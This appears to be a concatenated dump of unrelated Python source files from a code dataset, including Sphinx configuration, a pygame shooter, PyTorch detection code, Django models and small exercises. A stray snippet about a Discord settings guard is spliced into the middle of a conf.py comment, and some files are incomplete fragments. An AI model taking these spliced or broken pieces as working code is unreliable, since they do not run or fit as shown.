|version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nversion = '1.0'\n# The full version, including alpha/beta/rc tags.\nrelease = '1.0.0'\n\n# Else, today_fmt is used as the format for a strftime call.\ntoday_fmt = '%Y-%m-%d %H:%M'\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = ['_make']\nexclude_trees = ['_make']\n\n# If true, sectionauthor and moduleauthor directives will be shown in the\n# output. They are ignored by default.\nshow_authors = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n# -- Options for HTML output ----------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = 'default'\n\n# Add any paths that contain custom themes here, relative to this directory.\nhtml_theme_path = []\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['../Images']\n\n# If true, \"Created using Sphinx\" is shown in the HTML footer. Default is True.\nhtml_show_sphinx = False\n\n# If true, \"(C) Copyright ...\" is shown in the HTML footer. 
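# On the Discord cog further above: update_setting guards list indexing with
# an isdigit() check plus explicit bounds before touching
# settings[alert]['instances']. A stand-alone sketch of that guard (the dict
# shape is inferred from the cog; note this sketch rejects 0, which the
# original's `< 0` comparison lets through to index -1):
settings = {"daily_stats": {"instances": [{"channel": "general", "settings": {}}]}}

def set_alert(alert, alert_nr, key, value):
    if alert not in settings:
        return "invalid alert"
    if not alert_nr.isdigit():
        return "alert number must be a number"
    idx = int(alert_nr)
    if idx < 1 or idx > len(settings[alert]["instances"]):
        return "no entry with that alert number"
    settings[alert]["instances"][idx - 1]["settings"][key] = value
    return "updated"

print(set_alert("daily_stats", "1", "timezone", "UTC"))   # updated
print(set_alert("daily_stats", "0", "timezone", "UTC"))   # rejected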
Default is True.\nhtml_show_copyright = False\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'typo3_forum'\n\n\n# -- Options for LaTeX output --------------------------------------------------\n\nlatex_elements = {\n\n# The font size ('10pt', '11pt' or '12pt').\n#'pointsize': '10pt',\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title,\n# author, documentclass [howto, manual, or own class]).\nlatex_documents = [\n ('index', 'typo3_forum.tex', u'typo3\\_forum',\n u'Mittwald CM Service', 'manual'),\n]\n\n# -- Options for rst2pdf output ------------------------------------------------\n\n# The options element is a dictionary that lets you override\n# this config per-document.\n# For example,\n# ('index', u'MyProject', u'My Project', u'Author Name',\n# dict(pdf_compressed = True))\n# would mean that specific document would be compressed\n# regardless of the global pdf_compressed setting.\npdf_documents = [\n ('index', 'typo3_forum', u'typo3\\_forum',\n u'Mittwald CM Service', 'manual'),\n]\n\n# A comma-separated list of custom stylesheets. Example:\npdf_stylesheets = ['sphinx','kerning','a4']\n\n# A list of folders to search for stylesheets. Example:\npdf_style_path = ['.', '_styles']\n\n# How many levels deep should the table of contents be?\npdf_toc_depth = 9999\n\n# Add section number to section references\npdf_use_numbered_links = False\n\n# Background images fitting mode\npdf_fit_background_mode = 'scale'\n\n\n# -- Options for manual page output ---------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n ('index', 'typo3_forum', u'typo3_forum',\n [u'Mittwald CM Service'], 1)\n]\n\n# If true, show URL addresses after external links.\n#man_show_urls = False\n\n# -- Options for Texinfo output -------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [\n ('index', 'typo3_forum', u'typo3_forum',\n u'Mittwald CM Service', 'typo3_forum', ' forum plugin for TYPO3',\n 'Miscellaneous'),\n]\n\n#=================================================\n#\n# TYPO3 codeblock BEGIN:\n#\n# Insert this codeblock at the end of your Sphinx\n# builder configuration file 'conf.py'.\n# This may enable TYPO3 specific features like\n# TYPO3 themes. 
It makes Yaml settings files work.\n#\n#-------------------------------------------------\n\nif 1 and \"TYPO3 specific\":\n\n try:\n t3DocTeam\n except NameError:\n t3DocTeam = {}\n\n try:\n import t3sphinx\n html_theme_path.insert(0, t3sphinx.themes_dir)\n html_theme = 'typo3sphinx'\n except:\n html_theme = 'default'\n\n t3DocTeam['conf_py_file'] = None\n try:\n t3DocTeam['conf_py_file'] = __file__\n except:\n import inspect\n t3DocTeam['conf_py_file'] = inspect.getfile(\n inspect.currentframe())\n\n t3DocTeam['conf_py_package_dir'] = os.path.abspath(os.path.dirname(\n t3DocTeam['conf_py_file']))\n t3DocTeam['relpath_to_master_doc'] = '..'\n t3DocTeam['relpath_to_logdir'] = '_not_versioned'\n t3DocTeam['path_to_logdir'] = os.path.join(\n t3DocTeam['conf_py_package_dir'],\n t3DocTeam['relpath_to_logdir'])\n t3DocTeam['pathToYamlSettings'] = os.path.join(\n t3DocTeam['conf_py_package_dir'],\n t3DocTeam['relpath_to_master_doc'], 'Settings.yml')\n try:\n t3DocTeam['pathToGlobalYamlSettings'] = \\\n t3sphinx.pathToGlobalYamlSettings\n except:\n t3DocTeam['pathToGlobalYamlSettings'] = None\n if not t3DocTeam['pathToGlobalYamlSettings']:\n t3DocTeam['pathToGlobalYamlSettings'] = os.path.join(\n t3DocTeam['conf_py_package_dir'], 'GlobalSettings.yml')\n try:\n __function = t3sphinx.yamlsettings.processYamlSettings\n except:\n __function = None\n if not __function:\n try:\n import yamlsettings\n __function = yamlsettings.processYamlSettings\n except:\n __function = None\n if __function:\n __function(globals(), t3DocTeam)\n\n#-------------------------------------------------\n#\n# TYPO3 codeblock END.\n#\n#=================================================\n","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":6524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105682365","text":"import urllib\nimport re\n\nurl = raw_input(\"Enter the web link : \")\np = urllib.urlopen(url)\na=p.read()\n\npattern = re.compile('img src=[ \"](.*?)\"' )\na = re.findall(pattern , a)\n\nf=open(\"new.txt\",\"w\")\n\nfor i in a:\n\t\n\t \tf.write(url + i +\"\\n\")\n\t\t\n\nf.close()\n","sub_path":"imgdown.py","file_name":"imgdown.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"62428735","text":"import tensorflow as tf\nimport common.encoding\nfrom common.datasets import SequenceDataset\n\npath = '/mnt/nfs_datasets/lakh_midi_full/drums_sequence_examples/training_drum_tracks.tfrecord'\n\ninput_size = common.encoding.DrumTimeSliceEncoder().output_size\nencoder = common.encoding.OneToOneSequenceEncoder(\n\tcommon.encoding.IdentityTimeSliceEncoder(input_size)\n)\n\ndataset = SequenceDataset([path], encoder)\n\nfeatures = dataset.load_single()\n\n# Run this graph\n_features = tf.contrib.learn.run_n(features, n=1)\nprint(_features[0])","sub_path":"musicgen/common/datasets/drums/test_dataset.py","file_name":"test_dataset.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"441965198","text":"newList = [\"eeny\", \"meeny\", \"minee\", \"moe\"]\n\ndef menu(list, question):\n for entry in list:\n print(1 + list.index(entry), end=\"\")\n print(\") \" + entry.title())\n\n question = int(input(question)) - 1\n\n return list[question].title()\n\nanswer = menu(newList, \"Which do you prefer? 
\")\n\nprint(\"You prefer \" + answer)\n\n","sub_path":"Training/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"571577438","text":"import sys\r\n\r\nfrom Samples.geocoder import get_coordinates, get_nearest_object\r\n\r\n\r\ndef main():\r\n # Забираем адресную точку из параметров запуска.\r\n address = ''\r\n try:\r\n address = \" \".join(sys.argv[1:])\r\n except:\r\n print('No data')\r\n exit(1)\r\n\r\n if not address:\r\n print('No data')\r\n exit(1)\r\n\r\n # Получаем координаты точки\r\n address_point = get_coordinates(address)\r\n\r\n # Получаем район.\r\n district_name = get_nearest_object(address_point, \"district\")\r\n print(district_name)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"2nd_year/WEB5. Работа с HTTP-API/Home/05_what_district.py","file_name":"05_what_district.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"437852144","text":"target = int(input())\nnum = input().split(\",\")\nnumbers = [int(i) for i in num]\nlengths = []\nfor i in range(len(numbers)-1):\n current = numbers[i]\n le = 1\n for j in range(i+1, len(numbers)):\n current += numbers[j]\n le += 1\n if current >= target:\n lengths.append(le)\n break\nif len(lengths) == 0:\n print(0)\nelse:\n lengths.sort()\n print(lengths[0])","sub_path":"Code/CodeRecords/2464/60619/252822.py","file_name":"252822.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"264856677","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom Courses.models import Course\nfrom People.models import Student\n\n# Create your models here.\n\nclass Question(models.Model):\n\tquestionID = models.AutoField(primary_key = True)\n\tquestionText = models.CharField('Question', max_length = 100, null = True)\n\tchoice1 = models.CharField('Choice 1', max_length = 50, null = True)\n\tchoice2 = models.CharField('Choice 2', max_length = 50, null = True)\n\tchoice3 = models.CharField('Choice 3', max_length = 50, null = True)\n\tchoice4 = models.CharField('Choice 4', max_length = 50, null = True)\n\t# questionMarks = models.IntegerField('Question Marks')\n\tcorrect = models.CharField('Correct Answer', max_length= 1, null = True)\n\nclass Test(models.Model):\n\ttestID = models.AutoField(primary_key = True)\n\ttestTitle = models.CharField('Title', max_length = 50)\n\tquestions = models.ManyToManyField(Question)\n\nclass Assignment(models.Model):\n\tassignmentID = models.AutoField(primary_key = True)\n\tassignmentTitle = models.CharField('Title', max_length = 50)\n\tassignmentText = models.CharField('Assignment', max_length = 500)\n\nclass Lecture(models.Model):\n\tlectureID = models.AutoField(primary_key = True)\n\tlectureTitle = models.CharField('Title', max_length = 50)\n\tlectureText = models.CharField('Lecture', max_length = 500)\n\tlectureWeek = models.IntegerField('Week No.', null = True)\n\nclass CourseContent(models.Model):\n\tcourseID = models.ForeignKey(Course)\n\tlectures = models.ManyToManyField(Lecture)\n\tassignments = models.ManyToManyField(Assignment)\n\ttests = models.ManyToManyField(Test)\n\nclass Evaluation(models.Model):\n\tstudentID = models.ForeignKey(Student)\n\ttestID = models.ForeignKey(Test)\n\tmarks = models.IntegerField('Marks 
Obtained')\n\n","sub_path":"OCMS/CourseMatter/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"630879702","text":"import unittest\n\nfrom a.hash_table import HashTable\n\n\nclass TestHashTable(unittest.TestCase):\n\n def setUp(self) -> None:\n self.ht = HashTable(11)\n self.ht[54] = 'cat'\n self.ht[26] = 'dog'\n self.ht[93] = 'lion'\n self.ht[17] = 'tiger'\n self.ht[77] = 'bird'\n self.ht[31] = 'cow'\n self.ht[44] = 'goat'\n\n def testHashTableSize(self):\n self.assertEqual(11, self.ht.size)\n\n def testHashTableSlots(self):\n self.assertEqual([77, 44, None, None, 26, 93, 17, None, None, 31, 54], self.ht.slots)\n\n def testHashTableItems(self):\n self.assertEqual(['bird', 'goat', None, None, 'dog', 'lion', 'tiger', None, None, 'cow', 'cat'], self.ht.items)\n\n def testHashTableGetAndSet(self):\n self.assertEqual('bird', self.ht.get(77))\n\n self.ht[55] = 'pig'\n self.assertEqual('pig', self.ht.get(55))\n\n self.ht[20] = 'chicken'\n self.assertEqual('chicken', self.ht.get(20))\n self.assertEqual([77, 44, 55, 20, 26, 93, 17, None, None, 31, 54], self.ht.slots)\n\n self.ht[20] = 'duck'\n self.assertEqual('duck', self.ht.get(20))\n self.assertEqual([77, 44, 55, 20, 26, 93, 17, None, None, 31, 54], self.ht.slots)\n\n self.assertEqual(None, self.ht.get(99))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"python/hash-table/a/test_hash_table.py","file_name":"test_hash_table.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"500789255","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom torch.autograd import Variable\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion*planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass FPN(nn.Module):\n def __init__(self, args):\n super(FPN, self).__init__()\n self.args = args\n\n num_blocks = [2,2,2,2]\n self.in_planes = 64\n\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n\n # Bottom-up layers\n self.layer1 = self._make_layer(Bottleneck, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(Bottleneck, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(Bottleneck, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(Bottleneck, 512, num_blocks[3], stride=2)\n\n # Top layer\n self.toplayer = nn.Conv2d(2048, 256, kernel_size=1, stride=1, padding=0) # Reduce channels\n\n # Smooth layers\n self.smooth1 = nn.Conv2d(256, 256, kernel_size=3, 
stride=1, padding=1)\n self.smooth2 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)\n self.smooth3 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)\n\n # Lateral layers\n self.latlayer1 = nn.Conv2d(1024, 256, kernel_size=1, stride=1, padding=0)\n self.latlayer2 = nn.Conv2d( 512, 256, kernel_size=1, stride=1, padding=0)\n self.latlayer3 = nn.Conv2d( 256, 256, kernel_size=1, stride=1, padding=0)\n\n self.to(args.device)\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def _upsample_add(self, x, y):\n '''Upsample and add two feature maps.\n Args:\n x: (Variable) top feature map to be upsampled.\n y: (Variable) lateral feature map.\n Returns:\n (Variable) added feature map.\n Note in PyTorch, when input size is odd, the upsampled feature map\n with `F.upsample(..., scale_factor=2, mode='nearest')`\n maybe not equal to the lateral feature map size.\n e.g.\n original input size: [N,_,15,15] ->\n conv2d feature map size: [N,_,8,8] ->\n upsampled feature map size: [N,_,16,16]\n So we choose bilinear upsample which supports arbitrary output sizes.\n '''\n _,_,H,W = y.size()\n return F.upsample(x, size=(H,W), mode='bilinear') + y\n\n def forward(self, x):\n # Bottom-up\n c1 = F.relu(self.bn1(self.conv1(x)))\n c1 = F.max_pool2d(c1, kernel_size=3, stride=2, padding=1)\n c2 = self.layer1(c1)\n c3 = self.layer2(c2)\n c4 = self.layer3(c3)\n c5 = self.layer4(c4)\n # Top-down\n p5 = self.toplayer(c5)\n p4 = self._upsample_add(p5, self.latlayer1(c4))\n p3 = self._upsample_add(p4, self.latlayer2(c3))\n p2 = self._upsample_add(p3, self.latlayer3(c2))\n # Smooth\n p4 = self.smooth1(p4)\n p3 = self.smooth2(p3)\n p2 = self.smooth3(p2)\n return p2, p3, p4, p5\n\n\n\nclass FocalLoss(nn.Module):\n def __init__(self, coder):\n super().__init__()\n\n self.coder = coder\n self.priors_cxcy = self.coder.center_anchor\n self.priors_xy = cxcy_to_xy(self.priors_cxcy)\n self.num_classes = self.coder.num_classes\n self.bce = nn.BCELoss(reduction='none')\n self.smooth_l1 = SmoothL1Loss()\n # self.smooth_l1 = nn.SmoothL1Loss(reduction=None)\n\n def forward(self, pred, b_boxes, b_labels):\n \"\"\"\n Forward propagation.\n :param pred (loc, cls) prediction tuple (N, 67995, 4) / (N, 67995, num_classes) or [120087] anchors\n :param labels: true object labels, a list of N tensors\n \"\"\"\n pred_loc = pred[0]\n pred_cls = pred[1]\n\n batch_size = pred_loc.size(0)\n n_priors = self.priors_xy.size(0)\n\n assert n_priors == pred_loc.size(1) == pred_cls.size(1) # 67995 --> 120087\n\n true_locs = torch.zeros((batch_size, n_priors, 4), dtype=torch.float).to(device) # (N, 67995, 4)\n true_classes = -1 * torch.ones((batch_size, n_priors, self.num_classes), dtype=torch.float).to(device) # (N, 67995, num_classes)\n depth = -1 * torch.ones((batch_size, n_priors), dtype=torch.bool).to(device) # (N, 67995)\n\n for i in range(batch_size):\n boxes = b_boxes[i] # xy coord\n labels = b_labels[i]\n\n ###################################################\n # match strategies -> make target #\n ###################################################\n iou = find_jaccard_overlap(self.priors_xy, boxes) # [67995, num_objects]\n IoU_max, IoU_argmax = iou.max(dim=1) # [67995]\n\n negative_indices = IoU_max < 0.4\n\n # ======================= make true classes ========================\n true_classes[i][negative_indices, 
:] = 0 # make negative\n\n depth[i][negative_indices] = 0\n\n positive_indices = IoU_max >= 0.5 # iou 가 0.5 보다 큰 아이들 - [67995]\n argmax_labels = labels[IoU_argmax] # assigned_labels\n\n # class one-hot encoding\n # 0 으로 만들고 이후에 1 을 넣어주기\n true_classes[i][positive_indices, :] = 0\n true_classes[i][positive_indices, argmax_labels[positive_indices].long()] = 1. # objects\n\n depth[i][positive_indices] = 1\n\n # =========================== make true locs ===========================\n true_locs_ = xy_to_cxcy(boxes[IoU_argmax]) # [67995, 4] 0~1 사이이다. boxes 가\n true_locs_ = self.coder.encode(true_locs_)\n true_locs[i] = true_locs_\n\n # ------------------------------------------ cls loss ------------------------------------------\n alpha = 0.25\n gamma = 2\n\n alpha_factor = torch.ones_like(true_classes).to(device) * alpha # alpha\n a_t = torch.where((true_classes == 1), alpha_factor, 1. - alpha_factor) # a_t\n p_t = torch.where(true_classes == 1, pred_cls, 1 - pred_cls) # p_t\n bce = self.bce(pred_cls, true_classes)\n cls_loss = a_t * (1 - p_t) ** gamma * bce # focal loss\n\n cls_mask = (depth >= 0).unsqueeze(-1).expand_as(cls_loss) # both fore and back ground\n num_of_pos = (depth > 0).sum().float().clamp(min=1) # only foreground (min=1)\n cls_loss = (cls_loss * cls_mask).sum() / num_of_pos # batch 의 bce loss\n # / batch 의 object 총갯수\n\n # ------------------------------------------ loc loss ------------------------------------------\n loc_mask = (depth > 0).unsqueeze(-1).expand_as(true_locs) # only foreground\n loc_loss = self.smooth_l1(pred_loc, true_locs) # (), scalar\n loc_loss = (loc_mask * loc_loss).sum() / num_of_pos\n # loc_loss *= 2 # balance values\n\n total_loss = (cls_loss + loc_loss)\n return total_loss, (loc_loss, cls_loss)","sub_path":"models/FPN/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"164417539","text":"__author__ = \"susmote\"\n\nimport pygame\nimport time\nimport random\nfrom pygame.locals import *\n\n\nenemy_list = pygame.sprite.Group()\n\n\nclass Base(pygame.sprite.Sprite):\n def __init__(self, screen_temp, x, y, image_name):\n pygame.sprite.Sprite.__init__(self)\n self.x = x\n self.y = y\n self.screen = screen_temp\n self.image = pygame.image.load(image_name)\n self.bullet_list = []\n\n\nclass BasePlane(Base):\n # 飞机基类\n def display(self):\n self.screen.blit(self.image, (self.x, self.y))\n\n for bullet in self.bullet_list:\n bullet.display()\n bullet.move()\n if bullet.judge():\n self.bullet_list.remove(bullet)\n\n\nclass HeroPlane(BasePlane):\n # 玩家飞机类\n def __init__(self, screen_temp):\n BasePlane.__init__(self, screen_temp, 120, 420, \"./img/hero1.png\")\n self.stop = True\n self.direction = None\n self.image = pygame.transform.scale(self.image, (int(100 * 0.6), int(124 * 0.6)))\n\n def display(self):\n self.screen.blit(self.image, (self.x, self.y))\n\n for bullet in self.bullet_list:\n bullet.display()\n bullet.move()\n if bullet.judge():\n self.bullet_list.remove(bullet)\n for enemy in enemy_list:\n bullet.hit_plane(enemy)\n\n def move(self):\n if not self.stop:\n if self.direction == \"left\":\n self.x -= 3\n if self.direction == \"right\":\n self.x += 3\n if self.direction == \"up\":\n self.y -= 3\n if self.direction == \"down\":\n self.y += 3\n\n def fire(self):\n self.bullet_list.append(Bullet(self.screen, self.x, self.y))\n\n\nclass EnemyPlane(BasePlane):\n # 敌机类\n def __init__(self, screen_temp):\n BasePlane.__init__(self, 
screen_temp, 0, 0, \"./img/enemy0.png\")\n self.live = True\n self.image = pygame.transform.scale(self.image, (int(51*0.6), int(39*0.6)))\n self.direction = \"right\"\n\n self.images = [pygame.image.load(\"./img/enemy0_down1.png\"),\n pygame.image.load(\"./img/enemy0_down2.png\"),\n pygame.image.load(\"./img/enemy0_down3.png\"),\n pygame.image.load(\"./img/enemy0_down4.png\")]\n self.step = 0\n self.rect = self.image.get_rect()\n\n def move(self):\n\n if self.direction == \"right\":\n self.x += 3\n elif self.direction == \"left\":\n self.x -= 3\n\n if self.x > int(0.6*480 - 0.6*51):\n self.direction = \"left\"\n elif self.x < 0:\n self.direction = \"right\"\n\n def fire(self):\n\n random_num = random.randint(1, 100)\n if random_num == 25 or random_num == 50 or random_num == 75:\n self.bullet_list.append(EnemyBullet(self.screen, self.x, self.y))\n\n def explode(self):\n while self.live:\n if self.step == len(self.images):\n self.live = False\n else:\n self.image = self.images[self.step]\n self.image = pygame.transform.scale(self.image, (int(51 * 0.6), int(39 * 0.6)))\n time.sleep(0.03)\n pygame.display.update()\n self.screen.blit(self.image, (self.x, self.y))\n self.step += 1\n\n\nclass BaseBullet(Base):\n def display(self):\n self.screen.blit(self.image, (self.x, self.y))\n\n\nclass Bullet(BaseBullet):\n # 子弹类\n def __init__(self, screen_temp, x, y):\n BaseBullet.__init__(self, screen_temp, x+24, y-11, \"./img/bullet.png\")\n self.image = pygame.transform.scale(self.image, (int(22 * 0.6), int(22 * 0.6)))\n self.rect = self.image.get_rect()\n\n def move(self):\n self.y -= 5\n\n def judge(self):\n if self.y < 0:\n return True\n else:\n return False\n\n def hit_plane(self, enemy):\n if self.judge():\n # 获取敌机的坐标\n print(\"敌机的坐标 :\",enemy.x, enemy.y)\n # 获取子弹的坐标\n print(\"子弹的坐标 :\", self.x, self.y)\n # 获取敌机的实时区域\n startX = enemy.x\n endX = enemy.x+(enemy.rect.width)\n print(startX)\n print(endX)\n if self.x > startX and self.x < endX:\n print(enemy)\n enemy.explode()\n\n\n\n\n\nclass EnemyBullet(BaseBullet):\n # 敌机子弹类\n def __init__(self, screen_temp, x, y):\n BaseBullet.__init__(self, screen_temp, x+12, y+17, \"./img/bullet1.png\")\n self.image = pygame.transform.scale(self.image, (int(9 * 0.6), int(21 * 0.6)))\n\n def move(self):\n self.y += 3\n\n def judge(self):\n if self.y > int(0.6*852):\n return True\n else:\n return False\n\n\ndef main():\n\n screen = pygame.display.set_mode((int(0.6*480), int(0.6*852)), 0, 32)\n\n pygame.display.set_caption(\"打飞机游戏 by susmote\")\n\n background = pygame.image.load(\"./img/background.png\")\n background = pygame.transform.scale(background, (int(0.6*480), int(0.6*852)))\n\n hero = HeroPlane(screen)\n\n enemy_list.add(EnemyPlane(screen))\n\n\n while True:\n\n screen.blit(background, (0, 0))\n\n hero.display()\n\n hero.move()\n\n for enemy in enemy_list:\n if enemy.live:\n enemy.display()\n enemy.move()\n enemy.fire()\n if len(enemy_list) < 1:\n enemy_list.add(EnemyPlane(screen))\n\n pygame.display.update()\n\n for event in pygame.event.get():\n\n if event.type == QUIT:\n print(\"exit\")\n exit()\n\n elif event.type == KEYDOWN:\n if event.key == K_a or event.key == K_LEFT:\n print('left')\n hero.stop = False\n hero.direction = \"left\"\n elif event.key == K_d or event.key == K_RIGHT:\n print('right')\n hero.stop = False\n hero.direction = \"right\"\n elif event.key == K_w or event.key == K_UP:\n print('up')\n hero.stop = False\n hero.direction = \"up\"\n elif event.key == K_s or event.key == K_DOWN:\n print('down')\n hero.stop = False\n hero.direction = 
\"down\"\n elif event.key == K_SPACE:\n print('space')\n hero.fire()\n elif event.key == K_ESCAPE:\n print(\"exit\")\n exit()\n elif event.type == KEYUP:\n if event.key == K_LEFT or event.key == K_a:\n hero.stop = True\n if event.key == K_RIGHT or event.key == K_d:\n hero.stop = True\n if event.key == K_UP or event.key == K_w:\n hero.stop = True\n if event.key == K_DOWN or event.key == K_s:\n hero.stop = True\n\n time.sleep(0.01)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"PlaneWar/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"14340630","text":"def division1(x, y):\n\tprint(x / y)\n\treturn x / y\n\ndef division2(x, y):\n\tprint(x // y)\n\treturn x // y\n\n# division1(5, 10)\ndivision2(5, 10)\n# division1(-8, 2)\ndivision2(-8, 2)\n# division1(17, 13)\ndivision2(17, 13)\n# division1(-10, -3)\ndivision2(-10, -3)\n# division1(15, -4)\ndivision2(15, -4)\n\n\n\n\n\n","sub_path":"python/java_vs_python.py3","file_name":"java_vs_python.py3","file_ext":"py3","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"372654308","text":"#from pacman3.py import *\nimport sys\nsys.path.insert(0, \".\\\\aima-python-master\")\nfrom search import *\nclass MazeGraph:\n\n def __init__(self, pac_game):\n self.pacGame=pac_game\n # self.maze_str=pac_game.strS #[str[0]][len(str)], for example, middlwMaze 18rows, 36 cols\n self.maze_height=len(self.pacGame.strS)\n self.maze_width=len(self.pacGame.strS[0])\n self.walls =pac_game.walls\n self.map = dict()\n self.graph=dict()\n self.edgeCosts={}\n self.sortedCapsulePos=[]\n\n\n def genGraph(self):\n dict={}\n\n xMax=self.maze_width\n yMax=self.maze_height\n\n for x in range(1,xMax-1):\n for y in range(1, yMax-1):\n if(self.walls[x][y]==True):\n continue;\n else:\n dict1={}\n\n if (self.walls[x][y+1] == False):\n dict1[(x, y+1)]=1 #south\n if (self.walls[x + 1][y] == False):\n dict1[(x + 1, y)] = 1 # suppose the cost is 1 east\n if (self.walls[x][y-1] == False):\n dict1[(x, y-1)] = 1 # suppose the cost is 1 North\n if (self.walls[x-1][y] == False): #West\n dict1[(x-1, y)] = 1\n dict[(x,y)]=dict1\n self.map=dict\n self.edgeCosts=dict\n self.graph=UndirectedGraph(self.map)\n self.graph.locations= {(0,0)}\n\n\n def getkey(self,item):\n return item[1]\n\n def print_map(self):\n for k, v in self.map.items():\n print(k, v)\n\n def print_keys(self):\n for k in self.map.keys():\n print (k)\n","sub_path":"CSCI4802-2020-pacmanlab2-ch3-UCS/maze_graph.py","file_name":"maze_graph.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"118408876","text":"import os\nimport logging\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.WARNING)\n\nfrom gensim import corpora, models, similarities\n\nfrom TextsDAO import TextsDAO\nfrom CorpusDAO import DictionaryDAO\nfrom CorpusDAO import CorpusDAO\n\n\n\nBASE_DIR = \".\"\nBASE_META_DIR = \".\"\nSERIALIZED_CORPUS = os.path.join(BASE_META_DIR, \"corpus.mm\")\nSERIALIZED_TFIDF_CORPUS = os.path.join(BASE_META_DIR, \"corpus_tfidf.mm\")\n\ndef main():\n\n dictionary = DictionaryDAO(BASE_META_DIR, BASE_DIR).getDictionary()\n\n if os.path.isfile(SERIALIZED_CORPUS):\n corpus = corpora.MmCorpus(SERIALIZED_CORPUS)\n else:\n corpus = CorpusDAO(BASE_META_DIR, BASE_DIR)\n 
corpora.MmCorpus.serialize(SERIALIZED_CORPUS, corpus)\n\n #for key, value in corpus.getDictionary().items():\n # print(\"Key:{} Value:{}\".format(key, value))\n # Confirm if its populated\n #for vector in corpus:\n # print(vector)\n if os.path.isfile(SERIALIZED_TFIDF_CORPUS):\n tfidf = models.TfidfModel(corpus)\n corpus_tfidf = corpora.MmCorpus(SERIALIZED_TFIDF_CORPUS)\n else:\n tfidf = models.TfidfModel(corpus)\n corpus_tfidf = tfidf[corpus]\n corpora.MmCorpus.serialize(SERIALIZED_TFIDF_CORPUS, corpus_tfidf)\n \n lsi = models.LsiModel(corpus_tfidf, id2word=dictionary, num_topics=20)\n corpus_lsi = lsi[corpus_tfidf]\n\n\n count = 0\n\n for doc in corpus_lsi:\n count += 1\n\n print(\"Length of corpus is \" + str(count))\n\n document = \"\"\"b''\nb\"When setting a form's opacity should I use a decimal or double?\"\nb\"

